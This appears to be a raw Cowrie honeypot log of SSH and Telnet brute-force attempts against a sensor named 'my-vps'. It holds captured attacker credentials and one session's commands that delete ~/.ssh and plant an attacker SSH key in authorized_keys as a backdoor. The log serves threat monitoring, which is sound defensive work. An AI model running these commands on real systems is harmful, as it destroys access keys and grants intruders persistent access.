{"eventid":"cowrie.session.closed","duration":12.756074666976929,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:05.707627Z","src_ip":"212.227.235.229","session":"44c26f417316"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59410,"dst_ip":"1.2.3.4","dst_port":23,"session":"5938369b42c0","protocol":"telnet","message":"New connection: 212.227.235.229:59410 (1.2.3.4:23) [session: 5938369b42c0]","sensor":"my-vps","timestamp":"2025-09-08T13:32:05.959507Z"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":6133,"dst_ip":"1.2.3.4","dst_port":22,"session":"8805c5e66d56","protocol":"ssh","message":"New connection: 49.247.35.31:6133 (1.2.3.4:22) [session: 8805c5e66d56]","sensor":"my-vps","timestamp":"2025-09-08T13:32:06.660290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:32:06.661053Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:32:06.974917Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.login.success","username":"root","password":"Asdfg","message":"login attempt [root/Asdfg] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:32:08.234573Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:32:08.888743Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:32:08.889666Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:32:08.890732Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:09.195544Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:32:09.801947Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:32:09.802655Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:32:10.096718Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:10.097634Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":19424,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b8dd79bfcb1","protocol":"ssh","message":"New connection: 49.247.35.31:19424 (1.2.3.4:22) [session: 0b8dd79bfcb1]","sensor":"my-vps","timestamp":"2025-09-08T13:32:10.379012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:32:10.380376Z","src_ip":"49.247.35.31","session":"0b8dd79bfcb1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:32:10.681328Z","src_ip":"49.247.35.31","session":"0b8dd79bfcb1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:32:11.861682Z","src_ip":"49.247.35.31","session":"0b8dd79bfcb1"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:13.155465Z","src_ip":"49.247.35.31","session":"0b8dd79bfcb1"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":35732,"dst_ip":"1.2.3.4","dst_port":22,"session":"34dc62e7cfbe","protocol":"ssh","message":"New connection: 49.247.35.31:35732 (1.2.3.4:22) [session: 34dc62e7cfbe]","sensor":"my-vps","timestamp":"2025-09-08T13:32:13.422764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:32:13.435901Z","src_ip":"49.247.35.31","session":"34dc62e7cfbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:32:13.700157Z","src_ip":"49.247.35.31","session":"34dc62e7cfbe"}
{"eventid":"cowrie.session.closed","duration":12.771018981933594,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:13.856057Z","src_ip":"212.227.125.160","session":"0c41cdaa63c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20931,"dst_ip":"1.2.3.4","dst_port":23,"session":"97c48dfa6501","protocol":"telnet","message":"New connection: 212.227.125.160:20931 (1.2.3.4:23) [session: 97c48dfa6501]","sensor":"my-vps","timestamp":"2025-09-08T13:32:14.048418Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:32:14.824655Z","src_ip":"49.247.35.31","session":"34dc62e7cfbe"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:15.100168Z","src_ip":"49.247.35.31","session":"8805c5e66d56"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:15.101054Z","src_ip":"49.247.35.31","session":"34dc62e7cfbe"}
{"eventid":"cowrie.session.closed","duration":12.645163297653198,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:17.064752Z","src_ip":"212.227.235.229","session":"23cfa5995ec0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14120,"dst_ip":"1.2.3.4","dst_port":23,"session":"9071ff4fe225","protocol":"telnet","message":"New connection: 212.227.235.229:14120 (1.2.3.4:23) [session: 9071ff4fe225]","sensor":"my-vps","timestamp":"2025-09-08T13:32:17.496454Z"}
{"eventid":"cowrie.session.closed","duration":12.74062204360962,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:18.700032Z","src_ip":"212.227.235.229","session":"5938369b42c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38418,"dst_ip":"1.2.3.4","dst_port":22,"session":"b890565e6d81","protocol":"ssh","message":"New connection: 212.227.235.229:38418 (1.2.3.4:22) [session: b890565e6d81]","sensor":"my-vps","timestamp":"2025-09-08T13:32:18.767089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:32:18.768341Z","src_ip":"212.227.235.229","session":"b890565e6d81"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:32:18.875377Z","src_ip":"212.227.235.229","session":"b890565e6d81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59739,"dst_ip":"1.2.3.4","dst_port":23,"session":"89f575bd48f4","protocol":"telnet","message":"New connection: 212.227.235.229:59739 (1.2.3.4:23) [session: 89f575bd48f4]","sensor":"my-vps","timestamp":"2025-09-08T13:32:18.972510Z"}
{"eventid":"cowrie.login.failed","username":"jake","password":"123456789","message":"login attempt [jake/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T13:32:19.343626Z","src_ip":"212.227.235.229","session":"b890565e6d81"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":53090,"dst_ip":"1.2.3.4","dst_port":22,"session":"07168509fd8c","protocol":"ssh","message":"New connection: 134.199.174.250:53090 (1.2.3.4:22) [session: 07168509fd8c]","sensor":"my-vps","timestamp":"2025-09-08T13:32:20.390436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:32:20.391417Z","src_ip":"134.199.174.250","session":"07168509fd8c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:20.450926Z","src_ip":"212.227.235.229","session":"b890565e6d81"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:32:20.677570Z","src_ip":"134.199.174.250","session":"07168509fd8c"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"1234","message":"login attempt [administrator/1234] failed","sensor":"my-vps","timestamp":"2025-09-08T13:32:21.642537Z","src_ip":"134.199.174.250","session":"07168509fd8c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:22.946617Z","src_ip":"134.199.174.250","session":"07168509fd8c"}
{"eventid":"cowrie.session.closed","duration":12.804960250854492,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:26.853291Z","src_ip":"212.227.125.160","session":"97c48dfa6501"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":22329,"dst_ip":"1.2.3.4","dst_port":23,"session":"0fa49899b655","protocol":"telnet","message":"New connection: 212.227.125.160:22329 (1.2.3.4:23) [session: 0fa49899b655]","sensor":"my-vps","timestamp":"2025-09-08T13:32:27.088988Z"}
{"eventid":"cowrie.session.closed","duration":12.558517932891846,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:30.054902Z","src_ip":"212.227.235.229","session":"9071ff4fe225"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16125,"dst_ip":"1.2.3.4","dst_port":23,"session":"4c2bbc8ec44f","protocol":"telnet","message":"New connection: 212.227.235.229:16125 (1.2.3.4:23) [session: 4c2bbc8ec44f]","sensor":"my-vps","timestamp":"2025-09-08T13:32:30.561458Z"}
{"eventid":"cowrie.session.closed","duration":12.776597023010254,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:31.749004Z","src_ip":"212.227.235.229","session":"89f575bd48f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45954,"dst_ip":"1.2.3.4","dst_port":22,"session":"14dad78c0d0a","protocol":"ssh","message":"New connection: 212.227.235.229:45954 (1.2.3.4:22) [session: 14dad78c0d0a]","sensor":"my-vps","timestamp":"2025-09-08T13:32:31.768573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:32:31.769279Z","src_ip":"212.227.235.229","session":"14dad78c0d0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:32:31.890713Z","src_ip":"212.227.235.229","session":"14dad78c0d0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60048,"dst_ip":"1.2.3.4","dst_port":23,"session":"722d7ca646b5","protocol":"telnet","message":"New connection: 212.227.235.229:60048 (1.2.3.4:23) [session: 722d7ca646b5]","sensor":"my-vps","timestamp":"2025-09-08T13:32:32.028820Z"}
{"eventid":"cowrie.login.failed","username":"builduser","password":"password1","message":"login attempt [builduser/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:32:32.414482Z","src_ip":"212.227.235.229","session":"14dad78c0d0a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:33.538931Z","src_ip":"212.227.235.229","session":"14dad78c0d0a"}
{"eventid":"cowrie.session.closed","duration":12.74111032485962,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:39.829998Z","src_ip":"212.227.125.160","session":"0fa49899b655"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23740,"dst_ip":"1.2.3.4","dst_port":23,"session":"186018fc77c8","protocol":"telnet","message":"New connection: 212.227.125.160:23740 (1.2.3.4:23) [session: 186018fc77c8]","sensor":"my-vps","timestamp":"2025-09-08T13:32:40.030958Z"}
{"eventid":"cowrie.session.closed","duration":12.21791934967041,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:42.779312Z","src_ip":"212.227.235.229","session":"4c2bbc8ec44f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10497,"dst_ip":"1.2.3.4","dst_port":23,"session":"735057881b3e","protocol":"telnet","message":"New connection: 212.227.235.229:10497 (1.2.3.4:23) [session: 735057881b3e]","sensor":"my-vps","timestamp":"2025-09-08T13:32:43.045341Z"}
{"eventid":"cowrie.session.closed","duration":12.647353172302246,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:32:44.676102Z","src_ip":"212.227.235.229","session":"722d7ca646b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60372,"dst_ip":"1.2.3.4","dst_port":23,"session":"5c259a41176d","protocol":"telnet","message":"New connection: 212.227.235.229:60372 (1.2.3.4:23) [session: 5c259a41176d]","sensor":"my-vps","timestamp":"2025-09-08T13:32:44.915243Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":32832,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d02b2c9c35c","protocol":"ssh","message":"New connection: 134.199.174.250:32832 (1.2.3.4:22) [session: 4d02b2c9c35c]","sensor":"my-vps","timestamp":"2025-09-08T13:32:49.934933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:32:49.935596Z","src_ip":"134.199.174.250","session":"4d02b2c9c35c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:32:50.268165Z","src_ip":"134.199.174.250","session":"4d02b2c9c35c"}
